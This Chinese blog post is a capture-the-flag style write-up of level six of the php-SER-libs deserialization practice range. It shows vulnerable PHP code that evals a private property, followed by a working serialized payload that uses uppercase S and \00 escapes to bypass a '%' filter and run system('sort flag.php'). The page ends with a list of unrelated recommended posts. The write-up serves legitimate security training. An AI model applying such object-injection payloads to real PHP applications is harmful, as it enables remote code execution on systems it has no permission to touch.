php-SER-libs(第六关--考察私有属性)

最新推荐文章于 2025-12-14 09:46:54 发布
原创 最新推荐文章于 2025-12-14 09:46:54 发布 · 506 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web安全 #安全

博客记录了PHP Web安全第六关的payload,即O:6:\secret\:1:{S:12:\\\00secret\\00comm\;s:24:\system('sort flag.php');\;}。解释了访问私有属性时用\\00代替%00的原因,以及大写S的作用。还提出为何cat和tac无回显,sort有回显的疑惑。

这篇记录一下第六关

<?php
highlight_file(__FILE__);
class secret{
    private $comm;
    public function __construct($com){
        $this->comm = $com;
    }
    function __destruct(){
        echo eval($this->comm);
    }
}
$param=$_GET['param'];
$param=str_replace("%","daydream",$param);
unserialize($param);
?>

这里直接给出payload

O:6:"secret":1:{S:12:"\00secret\00comm";s:24:"system('sort flag.php');";}

解释一下,访问私有属性时需要把类用%00包裹起来,但题目过滤了"%"

所以只能使用\00

还需要注意的是,箭头所指的是大写S,大写的S是为了区分大小写,可以理解为让解释器将\00理解为空字符,否则解释器会将\00认为是普通字符串而非空字符

记一个小疑惑:为什么cat和tac没有回显(URL编码后也不行),要用sort才有回显

php-SER-libs【made by 这周末在做梦】
这周末在做梦的博客
03-18 6182
本项目是一个php反序列化靶场,题目难度简单,容易上手。
PHP-SER-libs靶场通(1-9)
qq_73792226的博客
09-07 1249
就会直接终止,所以我们就要绕过这个匹配,在序列化后也就是在0:6中6的前面加上一个符号使其不被匹配上所以就有了payload。先让body成为my类里的,在让body去调用project,因为my类里没有project所以会调用__call方法。在you类中,有一个destruct方法,内将pro赋值给变量project再调用本类中的body中的project。本对输入的param进行了一个%的过滤,而且类中的属性的变量是私有属性。当array内包裹的第一个值是对象,第二个是对象内的方法时。
PHP反序列化靶场(php-SER-libs-main 第一部分)
dalaojiaoweb的博客
11-12 1298
此次靶场为utools-php-unserialize-main。适合有一定基础的师傅,内容是比较全面的,含有我们的大部分ctf中PHP反序列化的题型。
php-SER-libs-main反序列化靶场通详细思路
qq_73767109的博客
05-30 7083
这里先是要把my类实例化到body中,而project要是my中不存在的方法,理应随便赋值但是在触发__call后call需要输入两个参数,name可以自行赋值,但是func就要在触发时就有参数,所以在给project赋值的时候应该赋参数这样在。主要利用的是session.upload_progress.enabled 当该设置为on 的时候,在向服务器上传任意一个文件的时候php会把该上传文件的详细信息(如上传时间,文件名等)储存在session中,而当我们以。新手学习反序列化
php_ser扩展,在php容器中安装php扩展
weixin_33656931的博客
03-10 464
在docker的php容器中,有些扩展是需要自己安装的,安装方式有普通物理主机有所不同,在这里简单记录一下。一、如何在docker容器中安装php自带的扩展模块?1、进入到php容器中:2、查看php当前自带的扩展模块:或进入扩展模块目录下查看:php自带的扩展若没有安装的话,可以使用以下命令进行安装:3、安装gd扩展模块:a、先安装gd相应的依赖包:[root@server ~]$ apt-ge...
usb2.0-ser! CH34x 驱动程序 WIN10亲测.zip
05-08
标题中的“usb2.0-ser! CH34x 驱动程序 WIN10亲测.zip”表明这是一个针对Windows 10操作系统的USB 2.0串行接口(USB2.0-ser!)和CH34x系列芯片的驱动程序。CH34x系列芯片是由韦尔奇拉科技公司(WCH)生产的,常用于...
USB-232(usb2.0-ser!)CH341SER 驱动
10-10
USB-232(usb2.0-ser!)CH341SER 驱动。
PHP连接串口程序php_ser
09-23
php实现RS232串口通信 下载php_ser_5.2.0.zip 解冻把php_ser放到ext目录下, php.ini里加上: extension=php_ser.dll PHP code string ser_version( void ) void ser_open( string port, int baudrate, int databits, string parity, float stopbits, string flowcontrol ) string ser_isopen( void ) void ser_write( string data ) string ser_read( int chars_no ) void ser_close( void )
反序列化( iwebsec靶场,php-SER-libs-main反序列化靶场)
2401_85678054的博客
02-25 1427
反序列化(unserialize):把字节序列恢复为对象的过程,既把可以存储或传输的数据转化为对象的过程。 反序列化攻击:攻击者控制了序列化后的数据,将有害数据传递到应用程序代码中,发动针对应用程序的攻击。
php反序列化靶场,集合了常见的php反序列化漏洞——由这周末在做梦制作.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
libSSE-php 使用教程
gitblog_00158的博客
08-25 987
libSSE-php 使用教程 项目介绍 libSSE-php 是一个易于使用的面向对象库,用于实现 Server-Sent Events (SSE)。SSE 是一种允许服务器向浏览器推送实时更新的技术。这个库旨在简化 SSE 的实现过程,使得开发者可以更快速地集成这一功能到他们的项目中。 项目快速启动 安装 首先,你需要通过 Composer 安装 libSSE-php: composer re...
libSSE-php 开源项目教程
gitblog_00001的博客
05-25 447
libSSE-php 开源项目教程 1. 项目介绍 libSSE-php 是一个易于使用的面向对象库,专门用于实现 Server-Sent Events (SSE)。SSE 是一种服务器推送技术,允许服务器向客户端推送实时数据流。libSSE-php 简化了在 PHP 中实现 SSE 的过程,使得开发者可以轻松地将实时数据推送到客户端。 2. 项目快速启动 安装 首先,你需要安装 libSSE-p...
PHP源码编译安装
SokminYo
01-29 4570
1.在PHP官网下载PHP的源码包官网下载地址 2.解压并进入文件夹中  tar -zxvfg php-7.1.13 3.安装命令  ./configure  --prefix=/usr/local/php     #安装地址 --with-config-file-path=/etc      #配置文件 --enable-inline-optimization    #
【CAN通信】AUTOSAR架构下TC3xx芯片是如何进行模式切换的
最新发布
qq_36056498的博客
12-14 25
AUTOSAR架构下TC3xx芯片是如何进行模式切换的
【昆工】毕业可投的国际期刊
2503_94022055的博客
12-09 282
推荐码:ZMZ-01。推荐码:ZMZ-01。推荐码:ZMZ-01。推荐码:ZMZ-01。推荐码:ZMZ-01。
安装php7.4.33的shell脚本
qq_34886696的博客
12-11 165
本文介绍了一个用于CentOS 7系统的PHP 7.4.33自动化部署脚本。该脚本包含完整的安装流程:检查系统环境、创建必要目录、安装依赖库、下载并编译PHP源码、配置PHPPHP-FPM、创建systemd服务文件、优化系统参数等。脚本支持安装常用PHP扩展如Redis、ImageMagick,并包含安全配置和性能优化选项。安装完成后会生成测试脚本phpinfo.php,方便验证PHP是否正常运行。
Linux【4】:FTP服务搭建
Guardian
12-10 344
ftp服务搭建
Bugku HackINI 2022 Whois 详解
m0_56970656的博客
12-09 587
基础的Linux RCE 绕过。
php-ser-libs-main靶场安装
12-11
1. **下载源码**:首先从GitHub或其他官方仓库下载ser-libs-main的压缩包或者克隆仓库到本地。 ```bash git clone https://github.com/your-repo/php-ser-libs-main.git ``` 2. **创建虚拟环境**:为了保持项目的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hhhalloWelt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值